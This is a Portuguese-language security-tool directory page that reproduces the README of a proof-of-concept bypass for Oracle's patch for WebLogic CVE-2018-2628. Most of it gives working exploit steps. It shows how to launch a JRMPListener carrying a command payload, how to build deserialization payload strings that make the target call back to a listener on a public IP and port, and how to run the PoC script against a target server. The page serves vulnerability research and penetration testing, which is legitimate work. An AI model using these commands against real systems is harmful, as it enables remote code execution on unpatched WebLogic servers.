Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ysoserial-cve-2018-2628 — Alguns códigos para contornar o patch do Oracle WebLogic CVE-2018-2628 | Kitploit
Ferramentas/GitHubGitHub/tdy218/ysoserial-cve-2018-2628
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubtdy218/ysoserial-cve-2018-2628

ysoserial-cve-2018-2628

Alguns códigos para contornar o patch do Oracle WebLogic CVE-2018-2628

Ver Repositório
114484há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ysoserial-cve-2018-2628

0x1. Preparação

  • Prepare o ambiente de software necessário para o script POC, geração de Payload Object e execução do JRMPListener Python 2.7.x Oracle Java SE 1.7+
  • Prepare um ambiente WebLogic Server 10.3.6 com o Patch Set Update 180417 instalado (apenas AdminServer é suficiente) Se você já tiver um ambiente WebLogic com este PSU instalado, pode pular esta etapa.
  • Prepare a ferramenta POC Baixe o script POC (wls-cve-2018-2628-poc.py) deste projeto Baixe o arquivo jar (ysoserial-<version>-cve-2018-2628-all.jar) para geração de Payload Object e programa JRMPListener na página release deste projeto

0x2. Executar o JRMPListener

Formato do comando:

java -cp ysoserial-<version>-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener <listen port> <gadget class> <command>

Exemplo:

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "calc.exe"

Quando vir a saída *Opening JRMP listener on 22801, anote o endereço IP da máquina onde o JRMPListener está sendo executado (o exemplo é executado em um host Alibaba Cloud ECS com IP público 47.94.158.125) e a porta especificada.

0x3. Com base no endereço IP e porta de escuta do JRMPListener da etapa anterior, gere a string do Payload

Atualmente, existem dois métodos conhecidos (ao gerar a string do Payload Object, escolha um dos dois métodos abaixo):

  • Usando java.rmi.activation.Activator [CVE-2017-3248]

Formato do comando para gerar a string do Payload Object:

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient2 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

Exemplo:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Exemplo (dados binários de saída do Payload Object gerado com JRMPClient2):

  • Usando weblogic.jms.common.StreamMessageImpl para encapsular java.rmi.registry.Registry

Formato do comando para gerar a string do Payload Object:

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient3 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

Exemplo:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient3 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Exemplo (dados binários de saída do Payload Object gerado com JRMPClient3):

0x4. Editar e executar o script POC

Edite wls-cve-2018-2628-poc.py, substitua o valor da variável payload_str no topo do script pela string hex gerada no passo anterior (os dois valores da variável payload_str fornecidos no script podem ser usados diretamente, correspondendo aos hex strings gerados pelos dois métodos acima).

Formato do comando:

python wls-cve-2018-2628-poc.py <IP de escuta da instância WebLogic Server de destino> <Porta de escuta da instância WebLogic Server de destino>

Exemplo:

python wls-cve-2018-2628-poc.py 192.168.64.83 7001

Exemplo (com Patch Set Update 180417 instalado):

0x5. Agradecimentos

xxlegend@nsfocus (um dos descobridores e submissões da CVE-2018-2628, revelou o método de exploração e exemplos de código) badcode@knownsec (forneceu o exemplo de código para encapsular java.rmi.registry.Registry usando weblogic.jms.common.StreamMessageImpl) Projeto ysoserial (reúne muitos exploits de desserialização Java)

Baixar ferramenta